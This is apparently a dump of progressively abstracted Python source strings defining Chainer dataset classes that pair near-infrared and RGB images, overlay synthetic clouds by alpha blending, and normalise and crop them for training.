127.5 - 1.0\n nirrgb, rgbcloud = self.transform(nirrgb, rgbcloud)\n return nirrgb, rgbcloud\n\n\nclass RGB2RGBCLOUD(BaseTrain):\n\n def __init__(self, dir_rgb, dir_cloud, imlist_rgb, *args, **kwargs):\n super().__init__()\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n self.cloud = list(glob.glob(os.path.join(dir_cloud, '*.png')))\n self.size = kwargs.pop('size')\n self.augmentation = kwargs.pop('augmentation')\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n cloud = cv2.imread(random.choice(self.cloud), -1).astype(np.float32)\n alpha = cloud[:, :, 3] / 255.0\n alpha = np.broadcast_to(alpha[:, :, None], alpha.shape + (3,))\n clouded_rgb = (1.0 - alpha) * rgb + alpha * cloud[:, :, :3]\n clouded_rgb = np.clip(clouded_rgb, 0.0, 255.0)\n cloud = cloud[:, :, 3]\n rgbcloud = np.concatenate((rgb, cloud[:, :, None]), axis=2)\n rgb = clouded_rgb.transpose(2, 0, 1) / 127.5 - 1.0\n rgbcloud = rgbcloud.transpose(2, 0, 1) / 127.5 - 1.0\n rgb, rgbcloud = self.transform(rgb, rgbcloud)\n return rgb, rgbcloud\n\n\nclass NIR2RGB(BaseTrain):\n\n def __init__(self, dir_nir, dir_rgb, imlist_nir, imlist_rgb, *args, **\n kwargs):\n super().__init__()\n self.nir = read_imlist(dir_nir, imlist_nir)\n self.rgb = 
read_imlist(dir_rgb, imlist_rgb)\n self.size = kwargs.pop('size')\n self.augmentation = kwargs.pop('augmentation')\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n nir = cv2.imread(self.nir[i], 0).astype(np.float32)\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n nir = nir[None, :, :] / 127.5 - 1.0\n rgb = rgb.transpose(2, 0, 1) / 127.5 - 1.0\n nir, rgb = self.transform(nir, rgb)\n return nir, rgb\n",
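Throughout these steps, pixel data is normalised with / 127.5 - 1.0, which maps the 0..255 range onto roughly [-1, 1]; a matching inverse is needed when writing model outputs back to image files. A minimal sketch of the pair of mappings, purely as illustration (the function names are assumptions, not taken from the dump):

import numpy as np

def to_unit_range(img):
    # map uint8-scale pixels (0..255) to [-1, 1], as the dataset classes do
    return img.astype(np.float32) / 127.5 - 1.0

def to_pixel_range(img):
    # invert the mapping for saving or visualisation
    return np.clip((img + 1.0) * 127.5, 0.0, 255.0).astype(np.uint8)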
"<import token>\n<function token>\n<function token>\n<class token>\n\n\nclass TestNIR(chainer.dataset.DatasetMixin):\n <function token>\n <function token>\n <function token>\n\n\nclass TestRGB(chainer.dataset.DatasetMixin):\n\n def __init__(self, dir_rgb, imlist_rgb):\n super().__init__()\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n rgb = rgb.transpose(2, 0, 1) / 127.5 - 1.0\n return rgb,\n\n\nclass BaseTrain(chainer.dataset.DatasetMixin):\n\n def __init__(self):\n super().__init__()\n\n def transform(self, x, y):\n c, h, w = x.shape\n if self.augmentation:\n top = random.randint(0, h - self.size - 1)\n left = random.randint(0, w - self.size - 1)\n if random.randint(0, 1):\n x = x[:, :, ::-1]\n y = y[:, :, ::-1]\n else:\n top = (h - self.size) // 2\n left = (w - self.size) // 2\n bottom = top + self.size\n right = left + self.size\n x = x[:, top:bottom, left:right]\n y = y[:, top:bottom, left:right]\n return x, y\n\n\nclass NIRRGB2RGBCLOUD(BaseTrain):\n\n def __init__(self, dir_nir, dir_rgb, dir_cloud, imlist_nir, imlist_rgb,\n *args, **kwargs):\n super().__init__()\n self.nir = read_imlist(dir_nir, imlist_nir)\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n self.cloud = list(glob.glob(os.path.join(dir_cloud, '*.png')))\n self.size = kwargs.pop('size')\n self.augmentation = kwargs.pop('augmentation')\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n nir = cv2.imread(self.nir[i], 0).astype(np.float32)\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n cloud = cv2.imread(random.choice(self.cloud), -1).astype(np.float32)\n alpha = cloud[:, :, 3] / 255.0\n alpha = np.broadcast_to(alpha[:, :, None], alpha.shape + (3,))\n clouded_rgb = (1.0 - alpha) * rgb + alpha * cloud[:, :, :3]\n clouded_rgb = np.clip(clouded_rgb, 0.0, 255.0)\n nirrgb = np.concatenate((nir[:, :, None], clouded_rgb), axis=2)\n cloud = cloud[:, :, 3]\n rgbcloud = np.concatenate((rgb, cloud[:, :, None]), axis=2)\n nirrgb = nirrgb.transpose(2, 0, 1) / 127.5 - 1.0\n rgbcloud = rgbcloud.transpose(2, 0, 1) / 127.5 - 1.0\n nirrgb, rgbcloud = self.transform(nirrgb, rgbcloud)\n return nirrgb, rgbcloud\n\n\nclass RGB2RGBCLOUD(BaseTrain):\n\n def __init__(self, dir_rgb, dir_cloud, imlist_rgb, *args, **kwargs):\n super().__init__()\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n self.cloud = list(glob.glob(os.path.join(dir_cloud, '*.png')))\n self.size = kwargs.pop('size')\n self.augmentation = kwargs.pop('augmentation')\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n cloud = cv2.imread(random.choice(self.cloud), -1).astype(np.float32)\n alpha = cloud[:, :, 3] / 255.0\n alpha = np.broadcast_to(alpha[:, :, None], alpha.shape + (3,))\n clouded_rgb = (1.0 - alpha) * rgb + alpha * cloud[:, :, :3]\n clouded_rgb = np.clip(clouded_rgb, 0.0, 255.0)\n cloud = cloud[:, :, 3]\n rgbcloud = np.concatenate((rgb, cloud[:, :, None]), axis=2)\n rgb = clouded_rgb.transpose(2, 0, 1) / 127.5 - 1.0\n rgbcloud = rgbcloud.transpose(2, 0, 1) / 127.5 - 1.0\n rgb, rgbcloud = self.transform(rgb, rgbcloud)\n return rgb, rgbcloud\n\n\nclass NIR2RGB(BaseTrain):\n\n def __init__(self, dir_nir, dir_rgb, imlist_nir, imlist_rgb, *args, **\n kwargs):\n super().__init__()\n self.nir = read_imlist(dir_nir, imlist_nir)\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n self.size = kwargs.pop('size')\n self.augmentation = 
kwargs.pop('augmentation')\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n nir = cv2.imread(self.nir[i], 0).astype(np.float32)\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n nir = nir[None, :, :] / 127.5 - 1.0\n rgb = rgb.transpose(2, 0, 1) / 127.5 - 1.0\n nir, rgb = self.transform(nir, rgb)\n return nir, rgb\n",
"<import token>\n<function token>\n<function token>\n<class token>\n<class token>\n\n\nclass TestRGB(chainer.dataset.DatasetMixin):\n\n def __init__(self, dir_rgb, imlist_rgb):\n super().__init__()\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n rgb = rgb.transpose(2, 0, 1) / 127.5 - 1.0\n return rgb,\n\n\nclass BaseTrain(chainer.dataset.DatasetMixin):\n\n def __init__(self):\n super().__init__()\n\n def transform(self, x, y):\n c, h, w = x.shape\n if self.augmentation:\n top = random.randint(0, h - self.size - 1)\n left = random.randint(0, w - self.size - 1)\n if random.randint(0, 1):\n x = x[:, :, ::-1]\n y = y[:, :, ::-1]\n else:\n top = (h - self.size) // 2\n left = (w - self.size) // 2\n bottom = top + self.size\n right = left + self.size\n x = x[:, top:bottom, left:right]\n y = y[:, top:bottom, left:right]\n return x, y\n\n\nclass NIRRGB2RGBCLOUD(BaseTrain):\n\n def __init__(self, dir_nir, dir_rgb, dir_cloud, imlist_nir, imlist_rgb,\n *args, **kwargs):\n super().__init__()\n self.nir = read_imlist(dir_nir, imlist_nir)\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n self.cloud = list(glob.glob(os.path.join(dir_cloud, '*.png')))\n self.size = kwargs.pop('size')\n self.augmentation = kwargs.pop('augmentation')\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n nir = cv2.imread(self.nir[i], 0).astype(np.float32)\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n cloud = cv2.imread(random.choice(self.cloud), -1).astype(np.float32)\n alpha = cloud[:, :, 3] / 255.0\n alpha = np.broadcast_to(alpha[:, :, None], alpha.shape + (3,))\n clouded_rgb = (1.0 - alpha) * rgb + alpha * cloud[:, :, :3]\n clouded_rgb = np.clip(clouded_rgb, 0.0, 255.0)\n nirrgb = np.concatenate((nir[:, :, None], clouded_rgb), axis=2)\n cloud = cloud[:, :, 3]\n rgbcloud = np.concatenate((rgb, cloud[:, :, None]), axis=2)\n nirrgb = nirrgb.transpose(2, 0, 1) / 127.5 - 1.0\n rgbcloud = rgbcloud.transpose(2, 0, 1) / 127.5 - 1.0\n nirrgb, rgbcloud = self.transform(nirrgb, rgbcloud)\n return nirrgb, rgbcloud\n\n\nclass RGB2RGBCLOUD(BaseTrain):\n\n def __init__(self, dir_rgb, dir_cloud, imlist_rgb, *args, **kwargs):\n super().__init__()\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n self.cloud = list(glob.glob(os.path.join(dir_cloud, '*.png')))\n self.size = kwargs.pop('size')\n self.augmentation = kwargs.pop('augmentation')\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n cloud = cv2.imread(random.choice(self.cloud), -1).astype(np.float32)\n alpha = cloud[:, :, 3] / 255.0\n alpha = np.broadcast_to(alpha[:, :, None], alpha.shape + (3,))\n clouded_rgb = (1.0 - alpha) * rgb + alpha * cloud[:, :, :3]\n clouded_rgb = np.clip(clouded_rgb, 0.0, 255.0)\n cloud = cloud[:, :, 3]\n rgbcloud = np.concatenate((rgb, cloud[:, :, None]), axis=2)\n rgb = clouded_rgb.transpose(2, 0, 1) / 127.5 - 1.0\n rgbcloud = rgbcloud.transpose(2, 0, 1) / 127.5 - 1.0\n rgb, rgbcloud = self.transform(rgb, rgbcloud)\n return rgb, rgbcloud\n\n\nclass NIR2RGB(BaseTrain):\n\n def __init__(self, dir_nir, dir_rgb, imlist_nir, imlist_rgb, *args, **\n kwargs):\n super().__init__()\n self.nir = read_imlist(dir_nir, imlist_nir)\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n self.size = kwargs.pop('size')\n self.augmentation = kwargs.pop('augmentation')\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n 
nir = cv2.imread(self.nir[i], 0).astype(np.float32)\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n nir = nir[None, :, :] / 127.5 - 1.0\n rgb = rgb.transpose(2, 0, 1) / 127.5 - 1.0\n nir, rgb = self.transform(nir, rgb)\n return nir, rgb\n",
"<import token>\n<function token>\n<function token>\n<class token>\n<class token>\n\n\nclass TestRGB(chainer.dataset.DatasetMixin):\n <function token>\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n rgb = rgb.transpose(2, 0, 1) / 127.5 - 1.0\n return rgb,\n\n\nclass BaseTrain(chainer.dataset.DatasetMixin):\n\n def __init__(self):\n super().__init__()\n\n def transform(self, x, y):\n c, h, w = x.shape\n if self.augmentation:\n top = random.randint(0, h - self.size - 1)\n left = random.randint(0, w - self.size - 1)\n if random.randint(0, 1):\n x = x[:, :, ::-1]\n y = y[:, :, ::-1]\n else:\n top = (h - self.size) // 2\n left = (w - self.size) // 2\n bottom = top + self.size\n right = left + self.size\n x = x[:, top:bottom, left:right]\n y = y[:, top:bottom, left:right]\n return x, y\n\n\nclass NIRRGB2RGBCLOUD(BaseTrain):\n\n def __init__(self, dir_nir, dir_rgb, dir_cloud, imlist_nir, imlist_rgb,\n *args, **kwargs):\n super().__init__()\n self.nir = read_imlist(dir_nir, imlist_nir)\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n self.cloud = list(glob.glob(os.path.join(dir_cloud, '*.png')))\n self.size = kwargs.pop('size')\n self.augmentation = kwargs.pop('augmentation')\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n nir = cv2.imread(self.nir[i], 0).astype(np.float32)\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n cloud = cv2.imread(random.choice(self.cloud), -1).astype(np.float32)\n alpha = cloud[:, :, 3] / 255.0\n alpha = np.broadcast_to(alpha[:, :, None], alpha.shape + (3,))\n clouded_rgb = (1.0 - alpha) * rgb + alpha * cloud[:, :, :3]\n clouded_rgb = np.clip(clouded_rgb, 0.0, 255.0)\n nirrgb = np.concatenate((nir[:, :, None], clouded_rgb), axis=2)\n cloud = cloud[:, :, 3]\n rgbcloud = np.concatenate((rgb, cloud[:, :, None]), axis=2)\n nirrgb = nirrgb.transpose(2, 0, 1) / 127.5 - 1.0\n rgbcloud = rgbcloud.transpose(2, 0, 1) / 127.5 - 1.0\n nirrgb, rgbcloud = self.transform(nirrgb, rgbcloud)\n return nirrgb, rgbcloud\n\n\nclass RGB2RGBCLOUD(BaseTrain):\n\n def __init__(self, dir_rgb, dir_cloud, imlist_rgb, *args, **kwargs):\n super().__init__()\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n self.cloud = list(glob.glob(os.path.join(dir_cloud, '*.png')))\n self.size = kwargs.pop('size')\n self.augmentation = kwargs.pop('augmentation')\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n cloud = cv2.imread(random.choice(self.cloud), -1).astype(np.float32)\n alpha = cloud[:, :, 3] / 255.0\n alpha = np.broadcast_to(alpha[:, :, None], alpha.shape + (3,))\n clouded_rgb = (1.0 - alpha) * rgb + alpha * cloud[:, :, :3]\n clouded_rgb = np.clip(clouded_rgb, 0.0, 255.0)\n cloud = cloud[:, :, 3]\n rgbcloud = np.concatenate((rgb, cloud[:, :, None]), axis=2)\n rgb = clouded_rgb.transpose(2, 0, 1) / 127.5 - 1.0\n rgbcloud = rgbcloud.transpose(2, 0, 1) / 127.5 - 1.0\n rgb, rgbcloud = self.transform(rgb, rgbcloud)\n return rgb, rgbcloud\n\n\nclass NIR2RGB(BaseTrain):\n\n def __init__(self, dir_nir, dir_rgb, imlist_nir, imlist_rgb, *args, **\n kwargs):\n super().__init__()\n self.nir = read_imlist(dir_nir, imlist_nir)\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n self.size = kwargs.pop('size')\n self.augmentation = kwargs.pop('augmentation')\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n nir = cv2.imread(self.nir[i], 0).astype(np.float32)\n rgb = cv2.imread(self.rgb[i], 
1).astype(np.float32)\n nir = nir[None, :, :] / 127.5 - 1.0\n rgb = rgb.transpose(2, 0, 1) / 127.5 - 1.0\n nir, rgb = self.transform(nir, rgb)\n return nir, rgb\n",
"<import token>\n<function token>\n<function token>\n<class token>\n<class token>\n\n\nclass TestRGB(chainer.dataset.DatasetMixin):\n <function token>\n <function token>\n\n def get_example(self, i):\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n rgb = rgb.transpose(2, 0, 1) / 127.5 - 1.0\n return rgb,\n\n\nclass BaseTrain(chainer.dataset.DatasetMixin):\n\n def __init__(self):\n super().__init__()\n\n def transform(self, x, y):\n c, h, w = x.shape\n if self.augmentation:\n top = random.randint(0, h - self.size - 1)\n left = random.randint(0, w - self.size - 1)\n if random.randint(0, 1):\n x = x[:, :, ::-1]\n y = y[:, :, ::-1]\n else:\n top = (h - self.size) // 2\n left = (w - self.size) // 2\n bottom = top + self.size\n right = left + self.size\n x = x[:, top:bottom, left:right]\n y = y[:, top:bottom, left:right]\n return x, y\n\n\nclass NIRRGB2RGBCLOUD(BaseTrain):\n\n def __init__(self, dir_nir, dir_rgb, dir_cloud, imlist_nir, imlist_rgb,\n *args, **kwargs):\n super().__init__()\n self.nir = read_imlist(dir_nir, imlist_nir)\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n self.cloud = list(glob.glob(os.path.join(dir_cloud, '*.png')))\n self.size = kwargs.pop('size')\n self.augmentation = kwargs.pop('augmentation')\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n nir = cv2.imread(self.nir[i], 0).astype(np.float32)\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n cloud = cv2.imread(random.choice(self.cloud), -1).astype(np.float32)\n alpha = cloud[:, :, 3] / 255.0\n alpha = np.broadcast_to(alpha[:, :, None], alpha.shape + (3,))\n clouded_rgb = (1.0 - alpha) * rgb + alpha * cloud[:, :, :3]\n clouded_rgb = np.clip(clouded_rgb, 0.0, 255.0)\n nirrgb = np.concatenate((nir[:, :, None], clouded_rgb), axis=2)\n cloud = cloud[:, :, 3]\n rgbcloud = np.concatenate((rgb, cloud[:, :, None]), axis=2)\n nirrgb = nirrgb.transpose(2, 0, 1) / 127.5 - 1.0\n rgbcloud = rgbcloud.transpose(2, 0, 1) / 127.5 - 1.0\n nirrgb, rgbcloud = self.transform(nirrgb, rgbcloud)\n return nirrgb, rgbcloud\n\n\nclass RGB2RGBCLOUD(BaseTrain):\n\n def __init__(self, dir_rgb, dir_cloud, imlist_rgb, *args, **kwargs):\n super().__init__()\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n self.cloud = list(glob.glob(os.path.join(dir_cloud, '*.png')))\n self.size = kwargs.pop('size')\n self.augmentation = kwargs.pop('augmentation')\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n cloud = cv2.imread(random.choice(self.cloud), -1).astype(np.float32)\n alpha = cloud[:, :, 3] / 255.0\n alpha = np.broadcast_to(alpha[:, :, None], alpha.shape + (3,))\n clouded_rgb = (1.0 - alpha) * rgb + alpha * cloud[:, :, :3]\n clouded_rgb = np.clip(clouded_rgb, 0.0, 255.0)\n cloud = cloud[:, :, 3]\n rgbcloud = np.concatenate((rgb, cloud[:, :, None]), axis=2)\n rgb = clouded_rgb.transpose(2, 0, 1) / 127.5 - 1.0\n rgbcloud = rgbcloud.transpose(2, 0, 1) / 127.5 - 1.0\n rgb, rgbcloud = self.transform(rgb, rgbcloud)\n return rgb, rgbcloud\n\n\nclass NIR2RGB(BaseTrain):\n\n def __init__(self, dir_nir, dir_rgb, imlist_nir, imlist_rgb, *args, **\n kwargs):\n super().__init__()\n self.nir = read_imlist(dir_nir, imlist_nir)\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n self.size = kwargs.pop('size')\n self.augmentation = kwargs.pop('augmentation')\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n nir = cv2.imread(self.nir[i], 0).astype(np.float32)\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n nir = 
nir[None, :, :] / 127.5 - 1.0\n rgb = rgb.transpose(2, 0, 1) / 127.5 - 1.0\n nir, rgb = self.transform(nir, rgb)\n return nir, rgb\n",
"<import token>\n<function token>\n<function token>\n<class token>\n<class token>\n\n\nclass TestRGB(chainer.dataset.DatasetMixin):\n <function token>\n <function token>\n <function token>\n\n\nclass BaseTrain(chainer.dataset.DatasetMixin):\n\n def __init__(self):\n super().__init__()\n\n def transform(self, x, y):\n c, h, w = x.shape\n if self.augmentation:\n top = random.randint(0, h - self.size - 1)\n left = random.randint(0, w - self.size - 1)\n if random.randint(0, 1):\n x = x[:, :, ::-1]\n y = y[:, :, ::-1]\n else:\n top = (h - self.size) // 2\n left = (w - self.size) // 2\n bottom = top + self.size\n right = left + self.size\n x = x[:, top:bottom, left:right]\n y = y[:, top:bottom, left:right]\n return x, y\n\n\nclass NIRRGB2RGBCLOUD(BaseTrain):\n\n def __init__(self, dir_nir, dir_rgb, dir_cloud, imlist_nir, imlist_rgb,\n *args, **kwargs):\n super().__init__()\n self.nir = read_imlist(dir_nir, imlist_nir)\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n self.cloud = list(glob.glob(os.path.join(dir_cloud, '*.png')))\n self.size = kwargs.pop('size')\n self.augmentation = kwargs.pop('augmentation')\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n nir = cv2.imread(self.nir[i], 0).astype(np.float32)\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n cloud = cv2.imread(random.choice(self.cloud), -1).astype(np.float32)\n alpha = cloud[:, :, 3] / 255.0\n alpha = np.broadcast_to(alpha[:, :, None], alpha.shape + (3,))\n clouded_rgb = (1.0 - alpha) * rgb + alpha * cloud[:, :, :3]\n clouded_rgb = np.clip(clouded_rgb, 0.0, 255.0)\n nirrgb = np.concatenate((nir[:, :, None], clouded_rgb), axis=2)\n cloud = cloud[:, :, 3]\n rgbcloud = np.concatenate((rgb, cloud[:, :, None]), axis=2)\n nirrgb = nirrgb.transpose(2, 0, 1) / 127.5 - 1.0\n rgbcloud = rgbcloud.transpose(2, 0, 1) / 127.5 - 1.0\n nirrgb, rgbcloud = self.transform(nirrgb, rgbcloud)\n return nirrgb, rgbcloud\n\n\nclass RGB2RGBCLOUD(BaseTrain):\n\n def __init__(self, dir_rgb, dir_cloud, imlist_rgb, *args, **kwargs):\n super().__init__()\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n self.cloud = list(glob.glob(os.path.join(dir_cloud, '*.png')))\n self.size = kwargs.pop('size')\n self.augmentation = kwargs.pop('augmentation')\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n cloud = cv2.imread(random.choice(self.cloud), -1).astype(np.float32)\n alpha = cloud[:, :, 3] / 255.0\n alpha = np.broadcast_to(alpha[:, :, None], alpha.shape + (3,))\n clouded_rgb = (1.0 - alpha) * rgb + alpha * cloud[:, :, :3]\n clouded_rgb = np.clip(clouded_rgb, 0.0, 255.0)\n cloud = cloud[:, :, 3]\n rgbcloud = np.concatenate((rgb, cloud[:, :, None]), axis=2)\n rgb = clouded_rgb.transpose(2, 0, 1) / 127.5 - 1.0\n rgbcloud = rgbcloud.transpose(2, 0, 1) / 127.5 - 1.0\n rgb, rgbcloud = self.transform(rgb, rgbcloud)\n return rgb, rgbcloud\n\n\nclass NIR2RGB(BaseTrain):\n\n def __init__(self, dir_nir, dir_rgb, imlist_nir, imlist_rgb, *args, **\n kwargs):\n super().__init__()\n self.nir = read_imlist(dir_nir, imlist_nir)\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n self.size = kwargs.pop('size')\n self.augmentation = kwargs.pop('augmentation')\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n nir = cv2.imread(self.nir[i], 0).astype(np.float32)\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n nir = nir[None, :, :] / 127.5 - 1.0\n rgb = rgb.transpose(2, 0, 1) / 127.5 - 1.0\n nir, rgb = self.transform(nir, rgb)\n return nir, 
rgb\n",
"<import token>\n<function token>\n<function token>\n<class token>\n<class token>\n<class token>\n\n\nclass BaseTrain(chainer.dataset.DatasetMixin):\n\n def __init__(self):\n super().__init__()\n\n def transform(self, x, y):\n c, h, w = x.shape\n if self.augmentation:\n top = random.randint(0, h - self.size - 1)\n left = random.randint(0, w - self.size - 1)\n if random.randint(0, 1):\n x = x[:, :, ::-1]\n y = y[:, :, ::-1]\n else:\n top = (h - self.size) // 2\n left = (w - self.size) // 2\n bottom = top + self.size\n right = left + self.size\n x = x[:, top:bottom, left:right]\n y = y[:, top:bottom, left:right]\n return x, y\n\n\nclass NIRRGB2RGBCLOUD(BaseTrain):\n\n def __init__(self, dir_nir, dir_rgb, dir_cloud, imlist_nir, imlist_rgb,\n *args, **kwargs):\n super().__init__()\n self.nir = read_imlist(dir_nir, imlist_nir)\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n self.cloud = list(glob.glob(os.path.join(dir_cloud, '*.png')))\n self.size = kwargs.pop('size')\n self.augmentation = kwargs.pop('augmentation')\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n nir = cv2.imread(self.nir[i], 0).astype(np.float32)\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n cloud = cv2.imread(random.choice(self.cloud), -1).astype(np.float32)\n alpha = cloud[:, :, 3] / 255.0\n alpha = np.broadcast_to(alpha[:, :, None], alpha.shape + (3,))\n clouded_rgb = (1.0 - alpha) * rgb + alpha * cloud[:, :, :3]\n clouded_rgb = np.clip(clouded_rgb, 0.0, 255.0)\n nirrgb = np.concatenate((nir[:, :, None], clouded_rgb), axis=2)\n cloud = cloud[:, :, 3]\n rgbcloud = np.concatenate((rgb, cloud[:, :, None]), axis=2)\n nirrgb = nirrgb.transpose(2, 0, 1) / 127.5 - 1.0\n rgbcloud = rgbcloud.transpose(2, 0, 1) / 127.5 - 1.0\n nirrgb, rgbcloud = self.transform(nirrgb, rgbcloud)\n return nirrgb, rgbcloud\n\n\nclass RGB2RGBCLOUD(BaseTrain):\n\n def __init__(self, dir_rgb, dir_cloud, imlist_rgb, *args, **kwargs):\n super().__init__()\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n self.cloud = list(glob.glob(os.path.join(dir_cloud, '*.png')))\n self.size = kwargs.pop('size')\n self.augmentation = kwargs.pop('augmentation')\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n cloud = cv2.imread(random.choice(self.cloud), -1).astype(np.float32)\n alpha = cloud[:, :, 3] / 255.0\n alpha = np.broadcast_to(alpha[:, :, None], alpha.shape + (3,))\n clouded_rgb = (1.0 - alpha) * rgb + alpha * cloud[:, :, :3]\n clouded_rgb = np.clip(clouded_rgb, 0.0, 255.0)\n cloud = cloud[:, :, 3]\n rgbcloud = np.concatenate((rgb, cloud[:, :, None]), axis=2)\n rgb = clouded_rgb.transpose(2, 0, 1) / 127.5 - 1.0\n rgbcloud = rgbcloud.transpose(2, 0, 1) / 127.5 - 1.0\n rgb, rgbcloud = self.transform(rgb, rgbcloud)\n return rgb, rgbcloud\n\n\nclass NIR2RGB(BaseTrain):\n\n def __init__(self, dir_nir, dir_rgb, imlist_nir, imlist_rgb, *args, **\n kwargs):\n super().__init__()\n self.nir = read_imlist(dir_nir, imlist_nir)\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n self.size = kwargs.pop('size')\n self.augmentation = kwargs.pop('augmentation')\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n nir = cv2.imread(self.nir[i], 0).astype(np.float32)\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n nir = nir[None, :, :] / 127.5 - 1.0\n rgb = rgb.transpose(2, 0, 1) / 127.5 - 1.0\n nir, rgb = self.transform(nir, rgb)\n return nir, rgb\n",
"<import token>\n<function token>\n<function token>\n<class token>\n<class token>\n<class token>\n\n\nclass BaseTrain(chainer.dataset.DatasetMixin):\n <function token>\n\n def transform(self, x, y):\n c, h, w = x.shape\n if self.augmentation:\n top = random.randint(0, h - self.size - 1)\n left = random.randint(0, w - self.size - 1)\n if random.randint(0, 1):\n x = x[:, :, ::-1]\n y = y[:, :, ::-1]\n else:\n top = (h - self.size) // 2\n left = (w - self.size) // 2\n bottom = top + self.size\n right = left + self.size\n x = x[:, top:bottom, left:right]\n y = y[:, top:bottom, left:right]\n return x, y\n\n\nclass NIRRGB2RGBCLOUD(BaseTrain):\n\n def __init__(self, dir_nir, dir_rgb, dir_cloud, imlist_nir, imlist_rgb,\n *args, **kwargs):\n super().__init__()\n self.nir = read_imlist(dir_nir, imlist_nir)\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n self.cloud = list(glob.glob(os.path.join(dir_cloud, '*.png')))\n self.size = kwargs.pop('size')\n self.augmentation = kwargs.pop('augmentation')\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n nir = cv2.imread(self.nir[i], 0).astype(np.float32)\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n cloud = cv2.imread(random.choice(self.cloud), -1).astype(np.float32)\n alpha = cloud[:, :, 3] / 255.0\n alpha = np.broadcast_to(alpha[:, :, None], alpha.shape + (3,))\n clouded_rgb = (1.0 - alpha) * rgb + alpha * cloud[:, :, :3]\n clouded_rgb = np.clip(clouded_rgb, 0.0, 255.0)\n nirrgb = np.concatenate((nir[:, :, None], clouded_rgb), axis=2)\n cloud = cloud[:, :, 3]\n rgbcloud = np.concatenate((rgb, cloud[:, :, None]), axis=2)\n nirrgb = nirrgb.transpose(2, 0, 1) / 127.5 - 1.0\n rgbcloud = rgbcloud.transpose(2, 0, 1) / 127.5 - 1.0\n nirrgb, rgbcloud = self.transform(nirrgb, rgbcloud)\n return nirrgb, rgbcloud\n\n\nclass RGB2RGBCLOUD(BaseTrain):\n\n def __init__(self, dir_rgb, dir_cloud, imlist_rgb, *args, **kwargs):\n super().__init__()\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n self.cloud = list(glob.glob(os.path.join(dir_cloud, '*.png')))\n self.size = kwargs.pop('size')\n self.augmentation = kwargs.pop('augmentation')\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n cloud = cv2.imread(random.choice(self.cloud), -1).astype(np.float32)\n alpha = cloud[:, :, 3] / 255.0\n alpha = np.broadcast_to(alpha[:, :, None], 